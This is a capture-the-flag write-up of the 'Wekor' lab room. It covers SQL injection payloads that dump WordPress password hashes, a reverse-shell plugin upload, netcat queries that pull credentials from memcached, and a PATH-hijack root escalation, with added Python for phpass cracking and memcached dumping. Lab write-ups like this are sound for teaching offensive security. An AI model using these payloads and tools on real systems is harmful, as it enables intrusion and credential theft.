This room was a very interesting one which involved a couple of techniques I hadn't used before. It also required using some tools I've used a lot before but for different purposes. That being said, I started in the usual way by scanning for open ports.
# Nmap 7.91 scan initiated Sat May 29 00:36:16 2021 as: nmap -F -oN wekor.nmap 10.10.30.12
Nmap scan report for 10.10.30.12
Host is up (0.039s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Usually, when only ports 22 and 80 are open, the way into the server will be through the web application rather than SSH. I added wekor.thm to my /etc/hosts file and went to the URL.
This just displayed a simple white site with the text "Welcome internet user". I decided to scan for hidden directories/files.
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
A quick look at the robots.txt file revealed quite a lot of interesting directories to try.
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
None of these led anywhere, except one, which returned the following message.
Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot !
So I visited the /it-next directory and was greeted with the following website.
I searched the site for vulnerabilities and eventually found a field that was susceptible to SQL injection: the coupon code field on the Shopping Cart page.
I started by working out how many columns the legitimate query selects, because a UNION only works when both sides return the same number of columns. Closing the original string with a quote, appending an ORDER BY clause that names column positions, and commenting out the rest of the statement does this: the first position that errors is one more than the column count. (The trailing - after -- is there because MySQL only treats -- as a comment when whitespace follows it.) I entered the coupon code

' order by 1,2,3,4,5,6,7,8,9 -- -

and Unknown column '4' in 'order clause' was returned, so the query selects 3 columns.
From here I can run queries like the following to enumerate the schemas (databases) present on the server.

' union select 1,group_concat(schema_name),3 from information_schema.schemata -- -

UNION appends the rows of the injected SELECT to those of the original query. Because the injected quote closes the coupon string, the original WHERE clause matches nothing, so the only row that comes back is ours: 1, the names of every database on the server (group_concat collapses all rows into one comma-separated value, so a single-row response carries the whole list), and 3. The application then echoes those three columns back in its "valid coupon" message.

Coupon Code : 1 With ID : information_schema,coupons,mysql,performance_schema,sys,wordpress And With Expire Date Of : 3 Is Valid!
Interesting, so there is a wordpress database on the server and most likely a WordPress site running somewhere as well. I crafted a query to extract the usernames and password hashes from wp_users and then cracked the hashes offline with hashcat (WordPress stores them in the phpass "$P$" format, hashcat mode 400).
' union select 1, group_concat(user_login, ':', user_pass),3 from wordpress.wp_users -- -
admin:$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.
wp_jeffrey:$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10
wp_yura:$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/
wp_eagle:$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/
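As an added example (not the write-up's tooling), the following is a from-scratch implementation of the phpass scheme behind those "$P$B..." strings, which is what hashcat mode 400 computes for every candidate: the character after $P$ encodes the round count (B is 2^13), the next 8 characters are the salt, and the rest is the chained MD5 in phpass's own base64 alphabet. The setting, salt and wordlist are constructed; no hash from the room is reproduced.

```python
"""Added example, not from the write-up: the phpass "$P$" hash WordPress
keeps in wp_users.user_pass, plus a dictionary attack against it.
The sample setting and wordlist are constructed for this example."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass's own base64 variant: 6 bits at a time, little-endian, no padding."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password, setting):
    """Hash `password` under `setting` = '$P$' + cost char + 8-char salt
    (the first 12 characters of a stored hash). Cost char 'B' is 2**13 rounds."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass setting")
    rounds = 1 << ITOA64.index(setting[3])
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(rounds):  # sequential chain: this is the work factor
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password, stored):
    return phpass_crypt(password, stored[:12]) == stored


def crack(stored, wordlist):
    """Offline dictionary attack: first candidate that verifies, else None."""
    for candidate in wordlist:
        if phpass_verify(candidate, stored):
            return candidate
    return None


# Constructed: cost 'B' (8192 rounds) like the room's hashes, made-up salt.
SAMPLE_SETTING = "$P$Babcdefgh"

if __name__ == "__main__":
    h = phpass_crypt("wekor123", SAMPLE_SETTING)
    print(h)
    print("cracked:", crack(h, ["password", "letmein", "wekor123"]))
```

The per-candidate cost is 8193 MD5 calls, which is why a wordlist attack on a few hashes finishes quickly while a brute force over a long keyspace does not; hashcat's GPU implementation is doing exactly this chain, only much faster.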
I now had a valid username and password for a WordPress site somewhere, but did not know where to find it, so it was time to scan for subdomains.
Up until now I had only ever used gobuster to brute-force directories with the gobuster dir command, but I learned that it also has a vhost mode. Instead of resolving names through DNS, it keeps the target IP fixed and varies the Host header, which finds name-based virtual hosts on the same server even when they have no DNS record. I ran gobuster against wekor.thm and got the following results.
┌──(gareth㉿enso)-[~/Desktop/Files/Wekor]
└─$ gobuster vhost -u http://wekor.thm -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://wekor.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/05/31 21:52:03 Starting gobuster
===============================================================
Found: site.wekor.thm (Status: 200) [Size: 143]
I added this subdomain to my /etc/hosts file and visited the URL in my browser.
To my disappointment it did not reveal a wordpress site but instead simply said
Hi there! Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS! - Jim
I decided to do a normal directory scan on the site.wekor.thm subdomain to see if anything interesting stood out there.
┌──(gareth㉿enso)-[~/Desktop/Files/Wekor]
└─$ gobuster dir -u http://site.wekor.thm -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://site.wekor.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/05/31 21:55:13 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2021/05/31 21:55:32 Finished
===============================================================
I finally found the location of the WordPress blog site.
I was able to log in to the WordPress blog using one of the passwords cracked from the hashes I had extracted through the SQL injection.
The user I logged in as was wp_yura. This account was allowed to install plugins (a capability WordPress grants only to administrators by default), so I uploaded a WordPress reverse-shell plugin and got a connection back to my machine.
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Horizontal Privilege Escalation
Now that I had a shell on the server I could start trying to escalate my privileges. The tagline for the room said something about recognising internal services, so I checked which ports were listening locally and found one that had not appeared in the external scan: 11211.
A quick search for port 11211 suggested that memcached was running on the server. According to its website, memcached is a "Free and open source, high-performance, distributed memory object caching system".
Some searching on how to interrogate memcached showed that it speaks a plain text protocol, so I could use my good friend netcat to send commands to it. Thanks to HackTricks I was able to figure out how to query this memory object caching system and find something useful.
www-data@osboxes:/home$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
ITEM id [4 b; 1622488289 s]
ITEM email [14 b; 1622488289 s]
ITEM salary [8 b; 1622488289 s]
ITEM password [15 b; 1622488289 s]
ITEM username [4 b; 1622488289 s]
END
stats cachedump 1 0 lists the keys held in slab class 1 (the 0 means no limit on how many are returned). Keys with larger values live in other slab classes, which stats items or stats slabs will show, so on a real target check those first rather than assuming everything sits in class 1. I obviously wanted the username and password values, so after checking HackTricks for the syntax I fetched them with get:
www-data@osboxes:/home$ echo "get username" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE username 0 4
Orka
END
www-data@osboxes:/home$ echo "get password" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE password 0 15
<redacted>
END
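As an added example (not the write-up's commands), here is the same interrogation done from Python: it asks stats items which slab classes are in use, cachedumps each of them, and then gets every key it saw. A fake memcached serving constructed data is included so the exchange runs offline; the real service answers on 11211, the fake one on whatever free loopback port it is handed.

```python
"""Added example, not from the write-up: a memcached text-protocol client
that enumerates keys and values, plus a fake server with constructed data
so the exchange can be run without a real memcached."""
import socket
import threading

# Constructed sample data of the same shape as the room's cache contents.
SAMPLE_ITEMS = {"username": "Orka", "password": "example-only"}


def _lines_until_end(f):
    """Collect response lines up to the terminating END line."""
    out = []
    while True:
        line = f.readline()
        if not line or line.rstrip(b"\r\n") == b"END":
            return out
        out.append(line.rstrip(b"\r\n").decode())


def mc_get(f, key):
    """get <key> -> 'VALUE <key> <flags> <bytes>', the data block, then END;
    a missing key answers with END alone."""
    f.write(f"get {key}\r\n".encode())
    f.flush()
    header = f.readline().rstrip(b"\r\n")
    if header == b"END":
        return None
    nbytes = int(header.split()[3])
    data = f.read(nbytes)   # read by length: the data block may contain newlines
    f.read(2)               # trailing \r\n after the data block
    f.readline()            # END
    return data.decode()


def dump_memcached(host, port):
    """Return {key: value} for every key the server will list.
    'stats cachedump <slab> 0' only covers one slab class, so walk the
    classes that 'stats items' reports instead of assuming class 1."""
    with socket.create_connection((host, port), timeout=5) as s:
        f = s.makefile("rwb")
        f.write(b"stats items\r\n")
        f.flush()
        slabs = set()
        for line in _lines_until_end(f):       # STAT items:<slab>:<name> <value>
            parts = line.split()
            if len(parts) == 3 and parts[1].startswith("items:"):
                slabs.add(int(parts[1].split(":")[1]))
        keys = []
        for slab in sorted(slabs):
            f.write(f"stats cachedump {slab} 0\r\n".encode())
            f.flush()
            for line in _lines_until_end(f):   # ITEM <key> [<bytes> b; <expiry> s]
                if line.startswith("ITEM "):
                    keys.append(line.split()[1])
        return {k: mc_get(f, k) for k in keys}


def _serve_one(conn, items):
    """Minimal fake memcached: answers only the three commands used above,
    and pretends everything lives in slab class 1."""
    f = conn.makefile("rwb")
    while True:
        line = f.readline()
        if not line:
            break
        parts = line.decode().split()
        if not parts:
            continue
        if parts[:2] == ["stats", "items"]:
            f.write(f"STAT items:1:number {len(items)}\r\n".encode())
        elif parts[:2] == ["stats", "cachedump"]:
            for k, v in items.items():
                f.write(f"ITEM {k} [{len(v)} b; 0 s]\r\n".encode())
        elif len(parts) == 2 and parts[0] == "get" and parts[1] in items:
            v = items[parts[1]]
            f.write(f"VALUE {parts[1]} 0 {len(v)}\r\n{v}\r\n".encode())
        f.write(b"END\r\n")
        f.flush()
    conn.close()


def start_fake_memcached(items):
    """Serve `items` on a free loopback port in a background thread; return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            _serve_one(conn, items)

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = start_fake_memcached(SAMPLE_ITEMS)
    print(dump_memcached("127.0.0.1", port))
```

Against a real instance you would call dump_memcached("127.0.0.1", 11211) from the foothold shell, or tunnel the port out first; note that memcached has no authentication at all, so anything an application caches is readable by any local process that can reach the socket.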
With this username and password I was able to switch to the Orka user and capture the user flag.
www-data@osboxes:/home$ su Orka
Password:
Orka@osboxes:/home$ cd Orka
Orka@osboxes:~$ cat user.txt
<redacted>
Vertical Privilege Escalation
I started enumerating the server to try and find a way to escalate my privileges to the root user. I did my usual checks of what my user is allowed to run as sudo, what, if any, cron jobs are running and if there are any binaries with the SUID bit set.
I found that the Orka user could run the bitcoin binary as the root user.
Orka@osboxes:~/Desktop$ sudo -l
[sudo] password for Orka:
Matching Defaults entries for Orka on osboxes:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin
I ran strings on the bitcoin binary and found that it called a Python script, transfer.py. Unfortunately I didn't have write permission on transfer.py, but I noticed something about the way it was executed: the bitcoin binary invoked python by bare name rather than by absolute path, so the interpreter is located by searching PATH. That means I can create my own python file and have bitcoin execute it instead, provided it lives in a directory that is searched before the real interpreter.
Under sudo, env_reset replaces PATH with the secure_path from the sudo -l output above, so the lookup order for the root-run binary is fixed: /usr/local/sbin, /usr/local/bin, /usr/sbin, /usr/bin, and so on. The /usr/sbin directory was writable by the Orka user, and it is searched before /usr/bin, where the real interpreter normally lives. So I created my own "python" file there that simply starts a bash shell; when the root-run bitcoin executes it, I get a root shell.
Orka@osboxes:~/Desktop$ cd /usr/sbin
Orka@osboxes:/usr/sbin$ touch python
Orka@osboxes:/usr/sbin$ nano python
Orka@osboxes:/usr/sbin$ cat python
#!/bin/bash
/bin/bash
Orka@osboxes:/usr/sbin$ chmod +x python
Orka@osboxes:~/Desktop$ sudo ./bitcoin
Enter the password : password
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins : 9
root@osboxes:~/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:~/Desktop# cat /root/root.txt
<redacted>
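As an added example (not the author's code), the following Python reproduces the lookup that execvp()/system() perform when a program is named without a path, and checks which secure_path directories would shadow the real interpreter. The secure_path string is the one from the sudo -l output above; that the real python lives in /usr/bin is an assumption, and the temporary directories and fake interpreter are constructed for the demonstration.

```python
"""Added example, not from the write-up: PATH resolution and the
secure_path shadowing that made the /usr/sbin/python trick work."""
import os
import tempfile

# Copied from the sudo -l output; sudo's env_reset makes this the PATH the
# root-run bitcoin binary (and any shell it spawns) searches.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"


def resolve(name, path_str):
    """First executable regular file called `name` in PATH order (what
    execvp()/system() do for a bare command name), or None."""
    for d in path_str.split(":"):
        cand = os.path.join(d, name)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def shadowing_dirs(path_str, real_dir):
    """Directories searched before `real_dir`; a file planted in any of them
    wins the lookup. If real_dir is absent, every directory shadows it."""
    dirs = path_str.split(":")
    return dirs[:dirs.index(real_dir)] if real_dir in dirs else dirs


def writable_shadowing_dirs(path_str, real_dir):
    """The practical check: which shadowing directories can this user write to?"""
    return [d for d in shadowing_dirs(path_str, real_dir) if os.access(d, os.W_OK)]


def demo_hijack(name="python"):
    """Plant a fake interpreter in a writable directory that precedes the
    real one. Returns (fake wins when its dir is first, real wins when its
    dir is first)."""
    with tempfile.TemporaryDirectory() as fake_dir, tempfile.TemporaryDirectory() as real_dir:
        fake_bin = os.path.join(fake_dir, name)
        real_bin = os.path.join(real_dir, name)
        for p in (fake_bin, real_bin):
            with open(p, "w") as fh:
                fh.write("#!/bin/bash\n/bin/bash\n")  # the payload used in the write-up
            os.chmod(p, 0o755)
        hijacked = resolve(name, f"{fake_dir}:{real_dir}") == fake_bin
        # Ordering is the whole problem: with the real directory first the
        # plant is ignored. The fix for the binary is to not search at all
        # (exec /usr/bin/python3 by absolute path, or set PATH explicitly).
        real_wins = resolve(name, f"{real_dir}:{fake_dir}") == real_bin
        return hijacked, real_wins


if __name__ == "__main__":
    print("dirs that shadow /usr/bin under sudo:", shadowing_dirs(SECURE_PATH, "/usr/bin"))
    print("...of which writable by me:", writable_shadowing_dirs(SECURE_PATH, "/usr/bin"))
    print("hijack demo (fake wins, real wins):", demo_hijack())
```

On the room's box writable_shadowing_dirs(SECURE_PATH, "/usr/bin") run as Orka would report /usr/sbin, which is the whole finding in one call; on a correctly configured host it returns an empty list for any unprivileged user.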
I liked this room because it involved a few different techniques and felt quite realistic. I learned how to interrogate memcached and how to use gobuster to search for vhosts rather than just directories.